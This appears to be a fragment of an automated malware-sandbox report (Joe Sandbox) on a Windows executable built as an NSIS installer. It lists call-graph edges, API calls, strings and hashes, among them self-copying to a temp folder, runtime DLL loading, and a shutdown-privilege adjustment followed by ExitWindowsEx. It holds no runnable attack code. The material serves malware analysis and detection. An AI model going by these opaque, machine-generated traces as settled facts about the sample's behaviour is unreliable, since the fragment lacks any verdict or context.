4723->4725 4727 403d32 GetClassInfoW RegisterClassW 4724->4727 4728 403d48 DialogBoxParamW 4724->4728 4725->4731 4726->4724 4727->4728 4729 40140b 2 API calls 4728->4729 4729->4731 4730->4731 4731->4629 4732->4578 4733->4610 4734->4579 4736 403a01 4735->4736 4737 4039f7 
CloseHandle 4735->4737 4738 403a15 4736->4738 4739 403a0b CloseHandle 4736->4739 4737->4736 4783 403a43 4738->4783 4739->4738 4742 405afa 67 API calls 4743 403819 OleUninitialize 4742->4743 4743->4586 4743->4587 4745 405a63 4744->4745 4746 403838 ExitProcess 4745->4746 4747 405a77 MessageBoxIndirectW 4745->4747 4747->4746 4748->4619 4749->4631 4751 405a10 4750->4751 4752 405a04 CloseHandle 4750->4752 4751->4631 4752->4751 4754 405f1a GetTickCount GetTempFileNameW 4753->4754 4755 405f50 4754->4755 4756 4034a3 4754->4756 4755->4754 4755->4756 4756->4566 4757->4648 4758->4650 4759->4654 4760->4673 4761->4664 4763 403dc2 4762->4763 4779 40632f wsprintfW 4763->4779 4765 403e33 4780 403e67 4765->4780 4767 403b63 4767->4689 4768 403e38 4768->4767 4769 40640a 17 API calls 4768->4769 4769->4768 4770->4686 4771->4691 4773 4043ab SendMessageW 4772->4773 4776 405546 4773->4776 4774 40556d 4775 4043ab SendMessageW 4774->4775 4777 40557f OleUninitialize 4775->4777 4776->4774 4778 401389 2 API calls 4776->4778 4777->4720 4778->4776 4779->4765 4781 40640a 17 API calls 4780->4781 4782 403e75 SetWindowTextW 4781->4782 4782->4768 4784 403a51 4783->4784 4785 403a1a 4784->4785 4786 403a56 FreeLibrary GlobalFree 4784->4786 4785->4742 4786->4785 4786->4786 5893 404ba6 5894 404bd2 5893->5894 5895 404bb6 5893->5895 5897 404c05 5894->5897 5898 404bd8 SHGetPathFromIDListW 5894->5898 5904 405a32 GetDlgItemTextW 5895->5904 5900 404be8 5898->5900 5903 404bef SendMessageW 5898->5903 5899 404bc3 SendMessageW 5899->5894 5901 40140b 2 API calls 5900->5901 5901->5903 5903->5897 5904->5899 5919 700910e1 5928 70091111 5919->5928 5920 700911d8 GlobalFree 5921 700912ba 2 API calls 5921->5928 5922 700911d3 5922->5920 5923 700911f8 GlobalFree 5923->5928 5924 70091272 2 API calls 5927 700911c4 GlobalFree 5924->5927 5925 70091164 GlobalAlloc 5925->5928 5926 700912e1 lstrcpyW 5926->5928 5927->5928 5928->5920 5928->5921 5928->5922 5928->5923 5928->5924 5928->5925 5928->5926 5928->5927 5929 4029a8 5930 402c1f 
17 API calls 5929->5930 5931 4029ae 5930->5931 5932 4029d5 5931->5932 5933 4029ee 5931->5933 5938 40288b 5931->5938 5934 4029da 5932->5934 5942 4029eb 5932->5942 5935 402a08 5933->5935 5936 4029f8 5933->5936 5943 4063e8 lstrcpynW 5934->5943 5939 40640a 17 API calls 5935->5939 5937 402c1f 17 API calls 5936->5937 5937->5942 5939->5942 5942->5938 5944 40632f wsprintfW 5942->5944 5943->5938 5944->5938 5945 4028ad 5946 402c41 17 API calls 5945->5946 5947 4028bb 5946->5947 5948 4028d1 5947->5948 5949 402c41 17 API calls 5947->5949 5950 405eb9 2 API calls 5948->5950 5949->5948 5951 4028d7 5950->5951 5973 405ede GetFileAttributesW CreateFileW 5951->5973 5953 4028e4 5954 4028f0 GlobalAlloc 5953->5954 5955 402987 5953->5955 5956 402909 5954->5956 5957 40297e CloseHandle 5954->5957 5958 4029a2 5955->5958 5959 40298f DeleteFileW 5955->5959 5974 40345d SetFilePointer 5956->5974 5957->5955 5959->5958 5961 40290f 5962 403447 ReadFile 5961->5962 5963 402918 GlobalAlloc 5962->5963 5964 402928 5963->5964 5965 40295c 5963->5965 5967 4031d6 44 API calls 5964->5967 5966 405f90 WriteFile 5965->5966 5968 402968 GlobalFree 5966->5968 5972 402935 5967->5972 5969 4031d6 44 API calls 5968->5969 5971 40297b 5969->5971 5970 402953 GlobalFree 5970->5965 5971->5957 5972->5970 5973->5953 5974->5961 5982 401a30 5983 402c41 17 API calls 5982->5983 5984 401a39 ExpandEnvironmentStringsW 5983->5984 5985 401a4d 5984->5985 5987 401a60 5984->5987 5986 401a52 lstrcmpW 5985->5986 5985->5987 5986->5987 5063 402032 5064 402044 5063->5064 5065 4020f6 5063->5065 5066 402c41 17 API calls 5064->5066 5067 401423 24 API calls 5065->5067 5068 40204b 5066->5068 5073 402250 5067->5073 5069 402c41 17 API calls 5068->5069 5070 402054 5069->5070 5071 40206a LoadLibraryExW 5070->5071 5072 40205c GetModuleHandleW 5070->5072 5071->5065 5074 40207b 5071->5074 5072->5071 5072->5074 5086 406831 WideCharToMultiByte 5074->5086 5077 4020c5 5081 405450 24 API calls 5077->5081 5078 40208c 5079 402094 5078->5079 5080 4020ab 
5078->5080 5082 401423 24 API calls 5079->5082 5089 70091777 5080->5089 5083 40209c 5081->5083 5082->5083 5083->5073 5084 4020e8 FreeLibrary 5083->5084 5084->5073 5087 40685b GetProcAddress 5086->5087 5088 402086 5086->5088 5087->5088 5088->5077 5088->5078 5090 700917aa 5089->5090 5131 70091b5f 5090->5131 5092 700917b1 5093 700918d6 5092->5093 5094 700917c9 5092->5094 5095 700917c2 5092->5095 5093->5083 5165 70092394 5094->5165 5181 70092352 5095->5181 5100 700917ee 5101 7009182d 5100->5101 5102 7009180f 5100->5102 5105 7009187e 5101->5105 5106 70091833 5101->5106 5194 70092569 5102->5194 5103 700917f8 5103->5100 5191 70092d37 5103->5191 5104 700917df 5108 700917f0 5104->5108 5109 700917e5 5104->5109 5113 70092569 10 API calls 5105->5113 5213 700915c6 5106->5213 5185 70092724 5108->5185 5109->5100 5175 70092aac 5109->5175 5118 7009186f 5113->5118 5114 70091815 5205 700915b4 5114->5205 5123 700918c5 5118->5123 5219 7009252c 5118->5219 5120 700917f6 5120->5100 5121 70092569 10 API calls 5121->5118 5123->5093 5125 700918cf GlobalFree 5123->5125 5125->5093 5128 700918b1 5128->5123 5223 7009153d wsprintfW 5128->5223 5129 700918aa FreeLibrary 5129->5128 5226 7009121b GlobalAlloc 5131->5226 5133 70091b83 5227 7009121b GlobalAlloc 5133->5227 5135 70091da9 GlobalFree GlobalFree GlobalFree 5136 70091dc6 5135->5136 5151 70091e10 5135->5151 5137 70092192 5136->5137 5145 70091ddb 5136->5145 5136->5151 5139 700921b4 GetModuleHandleW 5137->5139 5137->5151 5138 70091c64 GlobalAlloc 5157 70091b8e 5138->5157 5142 700921da 5139->5142 5143 700921c5 LoadLibraryW 5139->5143 5140 70091caf lstrcpyW 5144 70091cb9 lstrcpyW 5140->5144 5141 70091ccd GlobalFree 5141->5157 5234 7009161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5142->5234 5143->5142 5143->5151 5144->5157 5145->5151 5230 7009122c 5145->5230 5147 7009222c 5149 70092239 lstrlenW 5147->5149 5147->5151 5235 7009161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 

                                                                                                            Control-flow Graph (function starting at 004034A5; rendered graph and raw edge list not reproduced here)
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNELBASE ref: 004034C8
                                                                                                            • GetVersion.KERNEL32 ref: 004034CE
                                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                            • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                                                                            • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                                            • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                                            • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                                                                            • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                                                                              • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                              • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036E8
                                                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403705
                                                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403721
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                            • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040374E
                                                                                                              • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                            • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                                                                            • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
                                                                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00436800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040388F
                                                                                                            • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\rXKfKM0T49.exe,00420EE8,?,?,00000006,00000008,0000000A), ref: 004038FD
                                                                                                            • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                                                                            • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                            • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                            • ExitProcess.KERNEL32 ref: 004039E0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                            • String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\rXKfKM0T49.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                            • API String ID: 3441113951-4259682330
                                                                                                            • Opcode ID: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                                                                            • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                                                                            • Opcode Fuzzy Hash: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                                                                            • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E

                                                                                                            Control-flow Graph (function starting at 00404DCC; rendered graph and raw edge list not reproduced here)
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                                                                            • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                                            • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                                                                            • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                                            • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                                            • InvalidateRect.USER32(?,00000000,?), ref: 0040534D
                                                                                                            • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                                            • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                            • String ID: $M$N
                                                                                                            • API String ID: 1638840714-813528018
                                                                                                            • Opcode ID: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                                                                            • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
• Opcode Fuzzy Hash: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
• Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58
APIs
• Part of subcall function 7009121B: GlobalAlloc.KERNEL32(00000040,?,7009123B,?,700912DF,00000019,700911BE,-000000A0), ref: 70091225
• GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 70091C6B
• lstrcpyW.KERNEL32(00000008,?), ref: 70091CB3
• lstrcpyW.KERNEL32(00000808,?), ref: 70091CBD
• GlobalFree.KERNEL32(00000000), ref: 70091CD0
• GlobalFree.KERNEL32(?), ref: 70091DB2
• GlobalFree.KERNEL32(?), ref: 70091DB7
• GlobalFree.KERNEL32(?), ref: 70091DBC
• GlobalFree.KERNEL32(00000000), ref: 70091FA6
• lstrcpyW.KERNEL32(?,?), ref: 70092140
• GetModuleHandleW.KERNEL32(00000008), ref: 700921B5
• LoadLibraryW.KERNEL32(00000008), ref: 700921C6
• GetProcAddress.KERNEL32(?,?), ref: 70092220
• lstrlenW.KERNEL32(00000808), ref: 7009223A
Memory Dump Source
• Source File: 00000000.00000002.1855880593.0000000070091000.00000020.00000001.01000000.00000004.sdmp, Offset: 70090000, based on PE: true
• Associated: 00000000.00000002.1855819178.0000000070090000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.1855965653.0000000070094000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.1855996025.0000000070096000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_70090000_rXKfKM0T49.jbxd
Similarity
• API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
• String ID:
• API String ID: 245916457-0
• Opcode ID: f63d7e57699737d82890d4fdda7ceed97cfc84bb2aa8a2919b323093f3c610aa
• Instruction ID: d5a735f8018440df2a0e4f4b6fa7e8dbdf45522bc3fec076411157206baae0dc
• Opcode Fuzzy Hash: f63d7e57699737d82890d4fdda7ceed97cfc84bb2aa8a2919b323093f3c610aa
• Instruction Fuzzy Hash: C222AE71E24209DEDB21CFB4C9846EDB7F6FB04B25F21452ED1A6E3280D7705A81EB58
APIs
• DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,00000000), ref: 00405B23
• lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,00000000), ref: 00405B6B
• lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,00000000), ref: 00405B8E
• lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,00000000), ref: 00405B94
• FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,00000000), ref: 00405BA4
• FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
• FindClose.KERNEL32(00000000), ref: 00405C53
Strings
Memory Dump Source
• Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
Similarity
• API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
• String ID: 0WB$C:\Users\user\AppData\Local\Temp\$\*.*
• API String ID: 2035342205-3222569857
• Opcode ID: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
• Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
• Opcode Fuzzy Hash: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
• Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
Memory Dump Source
• Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
• Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
• Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
• Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
APIs
• FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,?,?,76F92EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76F92EE0), ref: 00406736
• FindClose.KERNEL32(00000000), ref: 00406742
Strings
Memory Dump Source
• Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID: xgB
• API String ID: 2295610775-399326502
• Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
• Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
• Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
• Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C
APIs
• ShowWindow.USER32(00000000,00000000), ref: 00401E67
• EnableWindow.USER32(00000000,00000000), ref: 00401E72
Memory Dump Source
• Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
Similarity
• API ID: Window$EnableShow
• String ID:
• API String ID: 1136574915-0
• Opcode ID: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
• Instruction ID: b41365517dadb09c69eaf87789fd34eb77fb4a5ff64ddc4fb458d6156a5e0ce1
• Opcode Fuzzy Hash: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
• Instruction Fuzzy Hash: DFE0DF32E08200CFE724EFA5AA494AD77B4EB80324B20847FF201F11D1CE7858818F6E
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
• ShowWindow.USER32(?), ref: 00403EDF
• DestroyWindow.USER32 ref: 00403EF3
• SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
• GetDlgItem.USER32(?,?), ref: 00403F30
• SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
• IsWindowEnabled.USER32(00000000), ref: 00403F4B
• GetDlgItem.USER32(?,?), ref: 00403FF9
• GetDlgItem.USER32(?,00000002), ref: 00404003
• SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
• SendMessageW.USER32(0000040F,00000000,?,?), ref: 0040406E
• GetDlgItem.USER32(?,00000003), ref: 00404114
• ShowWindow.USER32(00000000,?), ref: 00404135
• KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404147
• EnableWindow.USER32(?,?), ref: 00404162
• GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00404178
• EnableMenuItem.USER32(00000000), ref: 0040417F
• SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404197
• SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
• lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
• SetWindowTextW.USER32(?,00423728), ref: 004041E8
• ShowWindow.USER32(?,0000000A), ref: 0040431C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
Similarity
• API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
• String ID: (7B
